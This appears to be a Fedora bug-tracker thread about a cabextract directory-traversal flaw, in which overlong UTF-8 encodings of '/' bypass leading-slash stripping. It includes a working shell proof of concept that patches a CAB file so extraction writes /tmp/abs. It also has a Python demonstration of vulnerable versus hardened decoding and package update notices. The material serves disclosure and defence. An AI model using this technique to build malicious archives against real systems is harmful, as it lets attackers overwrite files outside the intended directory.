It was reported [1] that cabextract is susceptible to a directory traversal vulnerability. While extracting files from an archive, it removes leading slashes from filenames but does it before possibly decoding UTF-8 and doesn't check for invalid UTF-8. Hence an absolute filename can be shoved through by using overlong encoding for the leading slash (and setting utf8 attribute in the header). This can be exploited by a malicious archive to write files outside the current directory.

Illustration:

  $ touch xxxxxxxxxx
  $ lcab xxxxxxxxxx test.cab
  $ sed -i 's|\x20\x00xxxxxxxxxx|\xa0\x00\xe0\x80\xaftmp/abs|g' test.cab
  $ rm xxxxxxxxxx
  $ ls /tmp/abs
  ls: cannot access /tmp/abs: No such file or directory
  $ ./cabextract test.cab
  Extracting cabinet: test.cab
    extracting /tmp/abs

  All done, no errors.
  $ ls /tmp/abs
  /tmp/abs

In the sed command above, \xe0\x80\xaf is an overlong encoding for '/', \xa0\x00 are flags updated to include utf-8 flag.

The issue was found in cabextract 1.4 and 2-byte encoding (\xc0\xaf) was enough to hide '/'. cabextract 1.5 tightened utf-8 checks and 3-byte encoding is now necessary.

The issue was reported to Stuart Caie today and fixed in less than 4h:
http://sourceforge.net/p/libmspack/code/217/

Another release of cabextract is expected in the next few days.

[1]: http://seclists.org/oss-sec/2015/q1/587
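The report above boils down to an order-of-operations bug: the slash check runs on raw bytes, and the decoder that later turns the bytes into a path accepts overlong forms. The following is an added example written for this page, not cabextract's or libmspack's code, that reproduces both halves of the problem in Python: a permissive decoder that maps C0 AF and E0 80 AF to '/', a filename routine that strips before decoding, and a hardened routine that decodes strictly first and then sanitises the decoded path. The 0x80 attribute bit (`_A_NAME_IS_UTF` in the CAB format, the bit the sed command turns on by changing 0x20 to 0xa0) is taken from the CAB specification; the hardened routine is one reasonable design, not a description of what r217 actually changed.

```python
"""Added example (not cabextract's code): why stripping leading slashes
before UTF-8 decoding lets an overlong-encoded '/' through, and one way
to do it safely."""

# CAB CFFILE attribs bit marking the filename as UTF-8 (_A_NAME_IS_UTF).
# 0x20 (archive) | 0x80 (UTF-8) == 0xA0, the value the report's sed writes.
A_NAME_IS_UTF = 0x80

# Smallest code point a sequence of each byte length may legitimately
# encode; anything below is an overlong form and must be rejected.
_MIN_CP = {1: 0x0, 2: 0x80, 3: 0x800, 4: 0x10000}


def utf8_decode(data: bytes, strict: bool) -> str:
    """Decode UTF-8 by hand.

    strict=False trusts the lead byte's length and never checks for the
    shortest form, so C0 AF and E0 80 AF both become '/'.  strict=True
    rejects overlong forms, surrogates and code points above U+10FFFF.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            cp, n = b, 1
        elif b & 0xE0 == 0xC0:
            cp, n = b & 0x1F, 2
        elif b & 0xF0 == 0xE0:
            cp, n = b & 0x0F, 3
        elif b & 0xF8 == 0xF0:
            cp, n = b & 0x07, 4
        else:
            raise ValueError("bad lead byte 0x%02x" % b)
        if i + n > len(data):
            raise ValueError("truncated sequence")
        for j in range(1, n):
            c = data[i + j]
            if c & 0xC0 != 0x80:
                raise ValueError("bad continuation byte 0x%02x" % c)
            cp = (cp << 6) | (c & 0x3F)
        if strict:
            if cp < _MIN_CP[n]:
                raise ValueError("overlong encoding of U+%04X" % cp)
            if 0xD800 <= cp <= 0xDFFF or cp > 0x10FFFF:
                raise ValueError("invalid code point U+%04X" % cp)
        out.append(chr(cp))
        i += n
    return "".join(out)


def vulnerable_output_path(raw_name: bytes, attribs: int) -> str:
    """Mirror the affected ordering: strip slashes on the raw bytes, then
    decode leniently.  The first byte 0xE0 is not a slash, so nothing is
    stripped, and the lenient decoder later turns E0 80 AF into '/'."""
    name = raw_name.lstrip(b"/\\")
    if attribs & A_NAME_IS_UTF:
        return utf8_decode(name, strict=False)
    return name.decode("latin-1")


def hardened_output_path(raw_name: bytes, attribs: int):
    """Decode strictly first, then sanitise the decoded string.

    Returns the relative path to write, or None if the entry must be
    refused (undecodable name, empty name, or a '..' component).
    """
    try:
        if attribs & A_NAME_IS_UTF:
            name = utf8_decode(raw_name, strict=True)
        else:
            name = raw_name.decode("latin-1")
    except ValueError:
        return None
    # Sanitise on the decoded text, where one character is one character.
    parts = [p for p in name.replace("\\", "/").split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        return None
    return "/".join(parts)


if __name__ == "__main__":
    # Constructed CFFILE name bytes matching the report's sed payload.
    evil = b"\xe0\x80\xaftmp/abs"
    print("vulnerable:", vulnerable_output_path(evil, 0xA0))   # /tmp/abs
    print("hardened:  ", hardened_output_path(evil, 0xA0))     # None
```

Run stand-alone it prints the absolute path the vulnerable ordering would create and `None` for the hardened one. The point to carry over to other extractors is that any check on a path (leading slash, `..`, drive letter) is only meaningful after the bytes have been converted to the representation the check reasons about, and that the conversion must reject non-canonical encodings rather than silently normalising them.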
Created cabextract tracking bugs for this issue: Affects: fedora-all [bug 1193955] Affects: epel-all [bug 1193956]
cabextract-1.5-1.fc21 has been pushed to the Fedora 21 stable repository. If problems still persist, please make note of it in this bug report.
cabextract-1.5-1.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.
cabextract-1.5-1.el7 has been pushed to the Fedora EPEL 7 stable repository. If problems still persist, please make note of it in this bug report.
cabextract-1.5-1.el6 has been pushed to the Fedora EPEL 6 stable repository. If problems still persist, please make note of it in this bug report.
cabextract-1.5-1.el5 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report.